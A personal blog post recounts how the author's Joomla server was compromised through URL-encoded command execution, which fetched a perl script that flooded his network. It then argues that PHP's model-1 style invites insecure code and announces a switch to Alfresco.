rm -rf Joomla

Joomla was nice, at least to get to know the concept of a CMS. Unfortunately, joomla itself is a really bad piece of software. It is a so-called model 1 architecture with both view and code in one file, much like JSPs with scriptlets are.

This model 1 architecture basically means that the code is totally unmaintanable and that it can contain a lot of problems hidden in the complexity of the code. One of those problems is that in some parts of the code, joomla actually uses commands encoded in URLs that will be executed by joomla when an HTTP request for such a URL is done.  This, in combination with default settings of PHP on my linux distribution allowed the server to be hacked some time ago. I detected this only because my local network stopped functioning.

What it did was download a perl script using wget and then execute it locally. The script itself then launched a denial of service attack but instead of doing this quietly so as not to be detected, the attack was done so aggressively that my modem could not handle it any more and since it was also managing DNS in my local network, this resulted in a breakdown of the local network. In a way I was lucky that the attack itself was so stupid because otherwise the attack could have gone unnoticed. 

Of course, some configuration settings of PHP can reduce the risks a little but still the problem is there and who knows what other creative ways there can be to use joomla to hack a server. Therefore, in a few weeks time, it will be goodbye Joomla. I am replacing it with Alfresco, a more professional CMS that I can simply run on the application server that I am already running a lot of applications on. And, given the professionality of the Java community, which I trust much more than the PHP community, this should be a much better solution. 

Thinking about it some more, the real problem with PHP is perhaps not even in the language itself. For instance, it is also possible to use model-1 architecture in Java and to execute commands encoded in request URLs. I don't think the security settings in my application server would prevent the execution of commands so in theory I am in equal danger with Java. Except of course that no-one in his right mind in the Java community would ever implement something like this. Model-1 was basically banned even before anyone really used it. Also, the general security awareness of Java is high so no one would ever try to write an application that executes commands encoded in URLs.

No, I think the real problem with PHP is, paradoxically, that everyone can understand it. One could call it a "people's programming language" since almost no development environment or tools are required and because simple results can be obtained quickly (Just as one can with JSP and scriptlets). As a result of this, many people without any mentionable design experience can hack together something in PHP. And that shows. I recently saw some small PHP pages for a project, and the same there, unmaintanable code from the first version that was written. 

 

 

 

This entry was posted in Devops/Linux. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *